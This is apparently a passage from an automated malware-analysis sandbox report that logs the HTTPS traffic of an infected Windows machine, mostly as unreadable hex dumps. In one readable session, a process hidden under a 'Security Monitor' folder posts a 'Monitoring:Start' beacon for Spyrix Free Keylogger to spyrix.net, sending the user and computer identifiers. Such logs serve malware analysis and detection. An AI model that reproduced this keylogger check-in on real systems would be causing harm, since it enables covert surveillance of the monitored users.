                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC2044INData Raw: 08 9f f4 8a 13 2d 32 32 c6 7c 72 f5 0d 79 b0 a1 ad 75 1a d3 c4 d3 e9 8c 6e 92 eb 5c e7 c5 e9 b7 13 3b 04 29 53 2b d3 be b4 72 7e 1d ff e6 d4 3f e9 14 e7 c9 21 c1 7f 61 b8 ae 2a 9b c0 aa f2 eb ab 5a c5 49 37 fb a1 69 29 36 ae 8d 78 a5 87 b2 9b 7b f9 69 6d 97 4e 92 4f 98 32 51 a2 48 71 29 43 38 5a 2e 00 82 9a 2f e2 3d 03 71 71 76 18 b8 2c e2 96 ee d2 23 04 8c 89 2f c8 8e 68 df f2 ab af cf bc df 7a be 4f 7e 75 a6 4c 80 44 f2 c9 f8 4f fc 2c f1 27 01 61 dc e2 23 f0 2e c5 a4 3e 46 1c 68 49 48 eb fa a9 fa f6 1a c0 7b 46 fc 09 60 4b 3e 1d 97 24 f9 a6 4f 4e 7d b1 cb 16 da 58 2b 46 80 fd bc f9 09 04 6b dd b0 f9 3d 98 59 13 a5 b3 6b 02 fb 67 9f f8 1b 00 86 7c 5a b2 59 3f 51 2f 16 69 2e 34 f1 fd 7e 42 74 25 17 d7 73 82 0d 74 71 70 8a 51 58 17 a5 0c df ba 38 dd 57 d8
                                                                                                                                                                                                                                                          Data Ascii: -22|ryun\;)S+r~?!a*ZI7i)6x{imNO2QHq)C8Z./=qqv,#/hzO~uLDO,'a#.>FhIH{F`K>$ON}X+Fk=Ykg|ZY?Q/i.4~Bt%stqpQX8W
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC4096INData Raw: 35 38 30 30 0d 0a 9d 31 fc 42 2b 3e 7f c1 4d 6d b1 21 39 ae 03 cd 60 51 5b fa a1 d0 b6 df 6a 6e b2 8b 36 19 5d 17 a2 47 65 3e 83 48 0e 1b be 33 c8 56 c5 68 e2 9e 90 0f 48 cf c6 3a dd 8c 27 7c 28 af 93 c3 0a ce 07 92 c4 29 de aa 56 c9 f3 30 ec 61 70 eb 2b 0e 05 89 cc 87 7a a9 8a 19 b3 88 d6 cb fa 35 ab 97 0d 6a b6 3a 28 b5 e9 df 9b f1 9e 83 d7 1d 2c cf 7d 23 04 73 0c 99 f5 b7 0c cb 1a 35 59 d9 c3 c0 12 41 b2 34 25 e6 9a 84 ac f9 0f e0 8d 9d f4 b0 f3 4c 5d 1b 8a 20 35 16 74 a0 74 ac dc 1c 9d f1 de ea 0e 58 dd b1 33 97 2c da 10 01 00 58 12 e6 ca c2 51 b7 e3 8f 63 45 7e b9 68 75 04 a6 6c c0 87 1e d9 55 ca 22 40 46 10 2b b8 8f 4a 63 71 74 0e b5 6b 04 92 69 06 c0 68 42 67 82 83 7e e1 43 0a b7 35 8b 61 34 8d 8e ed 23 30 0a 29 a5 03 72 7c 49 4e b5 15 47 8c 5a 3c
                                                                                                                                                                                                                                                          Data Ascii: 58001B+>Mm!9`Q[jn6]Ge>H3VhH:'|()V0ap+z5j:(,}#s5YA4%L] 5ttX3,XQcE~hulU"@F+JcqtkihBg~C5a4#0)r|INGZ<
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC4096INData Raw: 5d 1d 9f 91 a7 a6 4b 6a 45 ac 48 ba 36 fd d3 5d b1 27 97 2a 12 45 de 77 d2 65 0d d2 77 47 cf 5e 90 4b 9f 71 ab 10 ac c7 a8 7a 48 8a cb 15 89 40 d2 1c a5 77 3a 5d f6 85 19 8a 42 1e 31 3a 37 33 09 77 6e 3a a6 5b 4a f9 74 b7 18 d7 99 c4 0b be 6b 27 61 16 65 5a c6 07 fe 32 c1 b0 d9 99 8e 14 67 78 07 d3 42 a7 0e b3 f2 4a b5 ca 8c a2 22 c0 33 23 38 4c eb d2 5d 3c 30 3b c7 64 9d b9 15 6d dd 3e 01 f8 e5 4e 0f 7d a7 ff 06 96 e0 e2 ff 6d bf 87 7c de f0 2c 7f fc 58 b4 ef e8 19 56 28 fd 6a c6 b5 09 b3 9c bb 9a f0 79 fe f4 45 e7 ea f8 3c 3f 81 8f a5 78 1b 3c 90 04 1e 6f 47 f8 22 4c 98 be 68 6a b4 5d 40 8b 98 b1 f3 d2 59 d7 f4 18 da 3b 6c b7 64 67 17 98 dd b2 5b e5 ba 5f 88 55 38 d2 88 d0 0f ba 46 f0 c8 a9 6d c3 39 42 2c 10 08 19 52 cd fe b1 37 ff 37 8b b5 67 49 2b 82
                                                                                                                                                                                                                                                          Data Ascii: ]KjEH6]'*EwewG^KqzH@w:]B1:73wn:[Jtk'aeZ2gxBJ"3#8L]<0;dm>N}m|,XV(jyE<?x<oG"Lhj]@Y;ldg[_U8Fm9B,R77gI+
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC4096INData Raw: 4c 86 17 1a 61 32 26 06 dd fb fb df e2 5e 49 7d 1a d3 65 90 81 84 dc ac 56 34 83 3f 5e 34 c3 c6 34 47 f7 4e 6a cc ec 09 bc 61 40 43 ae 30 59 40 d7 82 ae 44 3d 76 b6 54 07 e3 4e d3 f1 a2 45 de 2b 44 9d 6a 3d 14 00 84 06 42 6f 38 a8 2a ff 21 6c 41 cf dc 7c 44 8e c3 4e 49 c4 b4 fe 7c 43 00 69 5a b6 cf e5 a3 87 df fc 95 d5 b6 69 81 af e9 90 2a 18 29 18 ba 4d ee 34 a7 ea 88 0e e8 5e e9 22 d6 25 85 f5 19 cb c0 46 b8 ff a3 bf 03 5f 87 80 35 d8 8c 6d 2e ff 81 1a 24 c9 31 c0 63 86 4f 3e e7 0a 68 70 2f d1 f9 99 54 f4 e5 3c 89 41 2c 45 47 ad 4c 26 12 8c 9c 16 59 4c fe 58 cb af 15 08 b1 0f 48 a1 46 e9 00 0c 22 a0 15 0e 51 a7 7e 87 e1 79 11 9e e2 cb 90 f6 d6 ba f1 f8 08 ba 49 d4 8f 57 ec 37 af d8 df 10 8e bc a6 0f f7 a4 13 0f 03 54 46 d9 39 e5 7d ac 3c cc 16 0c 8c 82
                                                                                                                                                                                                                                                          Data Ascii: La2&^I}eV4?^44GNja@C0Y@D=vTNE+Dj=Bo8*!lA|DNI|CiZi*)M4^"%F_5m.$1cO>hp/T<A,EGL&YLXHF"Q~yIW7TF9}<
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC4096INData Raw: ba 65 1d 7f de 83 57 b1 0b 16 31 2e 40 be e8 e2 4f b5 5f b4 b5 66 5a f3 69 73 c7 97 e1 82 65 38 d7 4a b2 0e a0 9d e6 0e 63 e7 12 06 29 0e 37 41 82 66 f7 9e 7e 34 78 5a 1e d8 2c d5 6c 09 62 52 3b 66 45 bb dd d4 ce c0 b2 d6 1d 53 b1 36 2f bc 0d 5b 91 14 38 9c 06 58 61 18 ae e0 c3 15 b1 8b 74 e6 e2 cf 51 b4 33 68 47 39 87 97 56 3a 46 87 83 fc 50 fa 6d e7 6d fd c3 56 42 69 ba 1b 45 2a b4 51 f0 b1 d5 a7 ec 59 64 02 8e 2e 69 58 3d 63 c5 8c f3 83 ad 99 8e 86 8b 26 8a 96 fb 0f aa 22 e8 42 c5 22 d4 c6 46 49 bc b1 32 89 30 02 05 83 90 0e 2c 88 21 8b 9e 19 58 de 51 20 7e dd 9a e4 f6 44 76 e7 4b df 50 9d e9 fa 37 5c 40 42 44 89 e1 3f fa 12 ca 69 02 9b a4 5b 5a e0 c6 85 a4 20 0b 04 4c ed 1c ef e5 6a 14 a1 42 52 36 43 40 c6 8c 62 a8 68 e7 8b 76 e4 01 9e ce a0 dd 7e 98
                                                                                                                                                                                                                                                          Data Ascii: eW1.@O_fZise8Jc)7Af~4xZ,lbR;fES6/[8XatQ3hG9V:FPmmVBiE*QYd.iX=c&"B"FI20,!XQ ~DvKP7\@BD?i[Z LjBR6C@bhv~


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          11192.168.2.755016158.69.117.1194434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC531OUTGET /cdn.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: dashboard.spyrix.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC344INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:24 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 987
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:14 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          ETag: "66fa8176-3db"
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000;
                                                                                                                                                                                                                                                          X-State: 3.0
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC987INData Raw: 0a 63 6c 61 73 73 20 43 64 6e 20 7b 0a 20 20 5f 6d 61 78 43 6f 75 6e 74 65 72 20 3d 20 33 30 3b 0a 20 20 5f 69 6e 74 65 72 76 61 6c 20 3d 20 6e 75 6c 6c 3b 0a 20 20 5f 63 6f 75 6e 74 65 72 20 3d 20 30 3b 0a 0a 20 20 69 6e 69 74 28 29 20 7b 0a 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 27 63 64 6e 2d 6f 66 66 3d 30 27 3b 20 2f 2f d0 bf d0 be d1 82 d0 be d0 bc d1 83 20 d1 87 d1 82 d0 be 20 d0 ba d1 83 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b1 d0 b8 d0 b2 d0 b0 d0 bb d0 b0 d1 81 d1 8c 20 d0 b8 20 d0 bd d0 b5 20 d0 bf d0 b5 d1 80 d0 b5 d0 b2 d0 be d0 b4 d0 b8 d0 bb d0 be 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 0a 20 20 20 20 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 20 3d 20 73 65 74 49 6e 74 65 72 76 61 6c 28
                                                                                                                                                                                                                                                          Data Ascii: class Cdn { _maxCounter = 30; _interval = null; _counter = 0; init() { // document.cookie = 'cdn-off=0'; // this._interval = setInterval(


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          12192.168.2.755019158.69.117.1194434008C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC166OUTPOST /dashboard/prg-actions HTTP/1.1
                                                                                                                                                                                                                                                          Host: spyrix.net
                                                                                                                                                                                                                                                          User-Agent: curl/7.64.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 423
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC423OUTData Raw: 26 61 63 74 69 6f 6e 3d 61 70 70 3a 4d 6f 6e 69 74 6f 72 69 6e 67 3a 53 74 61 72 74 26 64 61 74 61 3d 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 75 73 65 72 5f 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 26 75 73 65 72 3d 26 63 6f 6d 70 5f 6e 61 6d 65 3d 33 37 37 31 34 32 26 63 6f 6d 70 5f 69 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5f 32 34 31 30 30 32 30 31 35 36 32 35 26 63 6f 6d 70 5f 74 69 6d 65 3d 32 30 32 34 2d 31 30 2d 30 32 20 30 31 3a 35 38 3a 34 31 2e 38 38 31 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 20 28 29 26 6f 73 5f 74 79 70 65 3d 77
                                                                                                                                                                                                                                                          Data Ascii: &action=app:Monitoring:Start&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:41.881&prg_lng=english&os_caption= ()&os_type=w
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC170INHTTP/1.1 201 Created
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:25 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          13192.168.2.75501895.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC379OUTGET /dashboard30/assets/index-004f4025.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC344INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:25 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: W/"66fa817d-135fd2"
                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:38+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC3752INData Raw: 35 36 39 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c4 bd 0d 73 db 46 96 f7 fb 55 24 96 56 4b 8e 61 c5 ca cc ce ce 80 86 59 8c 2c c7 9a d8 4e 1c db 8a 12 45 cb 50 24 24 d1 a6 08 86 20 25 33 92 9e cf 7e 7f ff d3 2f 00 29 79 36 cf ad ba 75 ab 6c 11 68 34 fa e5 f4 e9 f3 de 07 57 fd d9 c6 de 41 f6 fd e9 c7 7c 30 df 19 e6 67 a3 49 fe c3 ac 98 e6 b3 f9 b2 7d c5 c3 83 83 ac 99 27 dd 64 de ca 9e 75 37 46 93 8d bc b3 77 60 25 37 f9 64 71 99 cf fa a7 e3 3c dd 7c 92 0c 8a c9 d9 e8 7c 11 ef af 67 a3 79 78 76 d5 1f 2f f2 74 7e d7 4a f3 e3 ee 49 36 b7 96 7f 9c 54 2d 37 0f d4 e6 7c 39 cd 8b b3 8d ee 66 d6 28 97 97 a7 c5 b8 d1 e9 3e 6a 34 52 f5 ce bf 76 f3 6c 31 19 cc 47 c5 a4 d9 ba a1 bb 72 be d1 cd 86 c5 80 51 4c e6 3b 83 59 de 9f e7 fb e3 5c 77 cd c6 78 34 f9 d4 68 ed cc
                                                                                                                                                                                                                                                          Data Ascii: 569csFU$VKaY,NEP$$ %3~/)y6ulh4WA|0gI}'du7Fw`%7dq<||gyxv/t~JI6T-7|9f(>j4Rvl1GrQL;Y\wx4h
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: ae 99 66 63 58 5c a6 8e f0 b8 97 1b 70 96 04 cf 46 bd c1 e0 8c 74 23 c5 10 1e 1a f3 83 7c 4f 3f 92 6a c4 9a 86 d8 c7 6d 41 86 c9 68 98 e6 e3 6a 33 0f b5 42 ad 0e 8a ea b0 95 da 4d 52 ef c4 5c c2 ad b6 b6 e2 0c ec e9 31 30 9b eb 0c bd 27 bb c9 c7 af fb d3 f4 26 1a 0b 52 a2 0a bc 8b de fb e6 93 68 54 e0 99 ae ef 60 55 d1 d3 3e 94 17 cd a4 63 e8 d0 45 8e 3b fe 24 08 33 67 59 73 91 41 ae 4d a7 72 64 04 e1 7f 08 ff 5f 29 5a c0 59 f0 9a 23 aa d7 9a 9d 7a e7 dc d9 49 e0 d3 3d 64 c4 da a4 7b 0f a3 25 2e c6 d9 8e cd e9 78 ba 8a 62 4e 78 ba 40 35 85 9a 00 2b 07 6a 10 7e da 6a 9d 64 53 e4 9f 9d 29 ab 8c 71 e0 dd 68 98 ef 9f 9d c1 94 f0 f8 81 b1 b3 9d b2 2a b9 bd c5 c0 99 ac 14 c9 b1 1e e5 e2 a2 39 4c ce 92 69 80 41 4f 2e aa a1 34 d0 b3 bb df da 2b af 1d f7 e8 36 28
                                                                                                                                                                                                                                                          Data Ascii: fcX\pFt#|O?jmAhj3BMR\10'&RhT`U>cE;$3gYsAMrd_)ZY#zI=d{%.xbNx@5+j~jdS)qh*9LiAO.4+6(
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: 0b 33 e1 af 94 18 09 8a 25 c1 74 df 03 99 db cd ce e6 f1 ff 34 4f fe f2 6b 4b f8 7c 4e 51 da 3c fe 9f 93 47 ad af 92 a9 90 fd ab 5f ff c2 ed 5f 3a bf fe e5 d7 af be 3a af 66 cb 08 57 dd b5 9e ad 55 9b 69 ca 46 60 17 38 fe d8 5b 56 9e 0c 19 e2 18 54 ed b4 0f 71 fa 76 30 e1 7c 49 74 be b7 de 3f 83 c5 c8 5f 01 81 f2 f1 9e 27 d9 e4 78 37 dc 20 2d 22 93 56 ec fa 47 01 fd 46 40 ee 12 d0 af 49 3b 30 40 a5 5d 74 11 25 6e 61 fe cc 62 a8 35 d6 83 d1 68 10 8f b2 c9 23 9d 99 88 8a b5 83 a7 1a f2 d2 81 2c d2 b9 6d 2b 57 7f 6e f5 03 e2 62 bf b0 03 16 d5 68 2f 0d 7a 0c 69 33 0f cb 22 89 42 48 7d 63 d1 54 38 5c cc b6 2a bb 58 1e db 41 3f 63 56 5d 38 08 bc c4 ea 65 8c 94 a8 fc c4 f9 d7 ed 95 0c b4 71 e1 a9 6e 70 57 4b 92 c4 60 62 c1 84 3e cd 13 c2 f8 8b eb 33 fa c2 64 4b
                                                                                                                                                                                                                                                          Data Ascii: 3%t4OkK|NQ<G__::fWUiF`8[VTqv0|It?_'x7 -"VGF@I;0@]t%nab5h#,m+Wnbh/zi3"BH}cT8\*XA?cV]8eqnpWK`b>3dK
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: 8b 2d 53 db 5c 99 a1 48 5a 4b c7 98 f7 34 1c e7 d3 40 75 8f 32 34 13 91 e3 40 f2 a9 7e 9d ab a2 8e c4 5d 5e 14 a5 5a 55 0f 24 42 52 5d d1 42 58 90 c9 33 12 b7 0e 16 89 2f 80 11 1a c4 ca 8b 54 c6 ca 7f 54 75 37 ce 18 8a 31 a1 f8 74 50 c7 73 f7 b8 fe b2 95 54 82 88 75 0c e9 13 aa fd 22 3c 93 a1 d7 a2 2e 7e 59 ba 75 08 51 17 12 10 25 5a f8 a8 12 bf bc c1 d1 26 28 38 1b 82 f3 79 05 a2 7b 16 fd 93 52 fc 0e c5 60 10 f2 ba a9 2d a2 af 6a 6c c7 4a f7 14 a6 64 c1 14 56 56 89 35 2c 84 89 35 f5 37 ee 40 ff 0d 57 af c6 13 ee 0f f1 f6 16 24 ed a2 76 81 6b e8 50 dd 5a ff a6 d5 b8 37 c2 e8 64 a2 59 2d 09 0e d8 de da 38 13 16 d9 06 55 17 a6 df d5 d6 c6 c3 d6 1b cb 02 12 fe e1 79 80 60 0d 4c 31 67 37 eb 7c c6 95 3a d1 c4 55 c1 bc 04 b3 75 18 ac af 8f 61 ee f1 7b 81 0e cc
                                                                                                                                                                                                                                                          Data Ascii: -S\HZK4@u24@~]^ZU$BR]BX3/TTu71tPsTu"<.~YuQ%Z&(8y{R`-jlJdVV5,57@W$vkPZ7dY-8Uy`L1g7|:Uua{
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: 3d 3a 7c 83 6d ae 34 bf 29 a1 69 51 e5 be 9e 5b e0 00 79 d8 63 8b 90 47 c0 7f 3a ab 1e 54 0d ba 67 21 dc e2 05 4e 93 17 3e 01 96 fb 78 f6 49 72 c0 d9 11 59 fe 7c e6 94 44 1f cf 22 ca d3 a7 03 e6 18 ca ac 54 c6 fa 61 2c 29 26 2e 35 dc 3e 38 30 4b 5f 28 7f 5c ed b2 7b 46 69 ed de 2e f7 b4 f6 9c 5b 1c ba ea ee 7d 81 20 77 05 b5 4b 7b bf 76 6f 97 0f be df 75 03 b5 01 ac 5c 6b 04 2b 05 56 b1 de c6 5d f2 cd 69 76 83 36 c2 67 a0 be 21 f8 0f 51 ce 6b 3f 9c bb 91 7a 92 1e ec 3b e3 01 a4 e7 c6 e9 e6 dd 98 ce 97 6c 46 d8 f7 91 b5 b4 c2 46 78 cb 3a c9 73 4b 2e f2 eb e3 0a a0 72 38 6f c3 1d 6f ca 76 27 6a c6 51 84 cd 99 d7 7c bc f4 63 cd 61 c3 85 d5 aa 4a 78 fa 0c 63 a3 24 79 d7 f6 a5 0e d2 ce c4 f9 2f 2d 03 32 9a 02 da 3e 16 dd 4b 7f ec d7 4b be 16 32 8f bf c3 ad 2f
                                                                                                                                                                                                                                                          Data Ascii: =:|m4)iQ[ycG:Tg!N>xIrY|D"Ta,)&.5>80K_(\{Fi.[} wK{vou\k+V]iv6g!Qk?z;lFFx:sK.r8oov'jQ|caJxc$y/-2>KK2/
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC2044INData Raw: aa f2 eb ab 5a c5 49 37 fb a1 69 29 36 ae 8d 78 a5 87 b2 9b 7b f9 69 6d 97 4e 92 4f 98 32 51 a2 48 71 29 43 38 5a 2e 00 82 9a 2f e2 3d 03 71 71 76 18 b8 2c e2 96 ee d2 23 04 8c 89 2f c8 8e 68 df f2 ab af cf bc df 7a be 4f 7e 75 a6 4c 80 44 f2 c9 f8 4f fc 2c f1 27 01 61 dc e2 23 f0 2e c5 a4 3e 46 1c 68 49 48 eb fa a9 fa f6 1a c0 7b 46 fc 09 60 4b 3e 1d 97 24 f9 a6 4f 4e 7d b1 cb 16 da 58 2b 46 80 fd bc f9 09 04 6b dd b0 f9 3d 98 59 13 a5 b3 6b 02 fb 67 9f f8 1b 00 86 7c 5a b2 59 3f 51 2f 16 69 2e 34 f1 fd 7e 42 74 25 17 d7 73 82 0d 74 71 70 8a 51 58 17 a5 0c df ba 38 dd 57 d8 04 17 ef f7 b1 c9 eb e2 d5 69 f2 dc 95 9c 12 66 6a 75 4e 93 1f dd c5 8c 30 06 95 5c 0c 92 3d bb 58 9e e2 d1 94 63 fa a5 a9 9c 2f bd 3a 5c e1 9d 8e a3 69 5b 70 6e 0a 7c f3 d7 3a 90 d1
                                                                                                                                                                                                                                                          Data Ascii: ZI7i)6x{imNO2QHq)C8Z./=qqv,#/hzO~uLDO,'a#.>FhIH{F`K>$ON}X+Fk=Ykg|ZY?Q/i.4~Bt%stqpQX8WifjuN0\=Xc/:\i[pn|:
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: 35 38 30 30 0d 0a c3 0a ce 07 92 c4 29 de aa 56 c9 f3 30 ec 61 70 eb 2b 0e 05 89 cc 87 7a a9 8a 19 b3 88 d6 cb fa 35 ab 97 0d 6a b6 3a 28 b5 e9 df 9b f1 9e 83 d7 1d 2c cf 7d 23 04 73 0c 99 f5 b7 0c cb 1a 35 59 d9 c3 c0 12 41 b2 34 25 e6 9a 84 ac f9 0f e0 8d 9d f4 b0 f3 4c 5d 1b 8a 20 35 16 74 a0 74 ac dc 1c 9d f1 de ea 0e 58 dd b1 33 97 2c da 10 01 00 58 12 e6 ca c2 51 b7 e3 8f 63 45 7e b9 68 75 04 a6 6c c0 87 1e d9 55 ca 22 40 46 10 2b b8 8f 4a 63 71 74 0e b5 6b 04 92 69 06 c0 68 42 67 82 83 7e e1 43 0a b7 35 8b 61 34 8d 8e ed 23 30 0a 29 a5 03 72 7c 49 4e b5 15 47 8c 5a 3c 0d 67 bf 2c 59 a3 d7 1a 86 a0 e1 82 fc 65 7e b5 f8 8e 09 59 67 06 02 30 6b c5 74 c4 04 b1 06 78 a2 55 54 db 17 8c 34 5a ac 08 01 a8 89 6f 4e 81 dd 2e c4 a1 70 62 57 78 d0 d7 17 b5 0a
                                                                                                                                                                                                                                                          Data Ascii: 5800)V0ap+z5j:(,}#s5YA4%L] 5ttX3,XQcE~hulU"@F+JcqtkihBg~C5a4#0)r|INGZ<g,Ye~Yg0ktxUT4ZoN.pbWx
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: 3a 37 33 09 77 6e 3a a6 5b 4a f9 74 b7 18 d7 99 c4 0b be 6b 27 61 16 65 5a c6 07 fe 32 c1 b0 d9 99 8e 14 67 78 07 d3 42 a7 0e b3 f2 4a b5 ca 8c a2 22 c0 33 23 38 4c eb d2 5d 3c 30 3b c7 64 9d b9 15 6d dd 3e 01 f8 e5 4e 0f 7d a7 ff 06 96 e0 e2 ff 6d bf 87 7c de f0 2c 7f fc 58 b4 ef e8 19 56 28 fd 6a c6 b5 09 b3 9c bb 9a f0 79 fe f4 45 e7 ea f8 3c 3f 81 8f a5 78 1b 3c 90 04 1e 6f 47 f8 22 4c 98 be 68 6a b4 5d 40 8b 98 b1 f3 d2 59 d7 f4 18 da 3b 6c b7 64 67 17 98 dd b2 5b e5 ba 5f 88 55 38 d2 88 d0 0f ba 46 f0 c8 a9 6d c3 39 42 2c 10 08 19 52 cd fe b1 37 ff 37 8b b5 67 49 2b 82 05 1a 6a ac 70 08 57 88 02 66 b1 98 af 73 78 77 44 1f 44 03 20 f6 1c a0 18 fa a0 f2 82 95 6f cf ab e7 2e 9a d9 65 8d 41 32 f0 03 7b c2 b8 de ce 6d 58 6f 0b a1 0e 9b 05 00 1e 01 56 5b
                                                                                                                                                                                                                                                          Data Ascii: :73wn:[Jtk'aeZ2gxBJ"3#8L]<0;dm>N}m|,XV(jyE<?x<oG"Lhj]@Y;ldg[_U8Fm9B,R77gI+jpWfsxwDD o.eA2{mXoV[
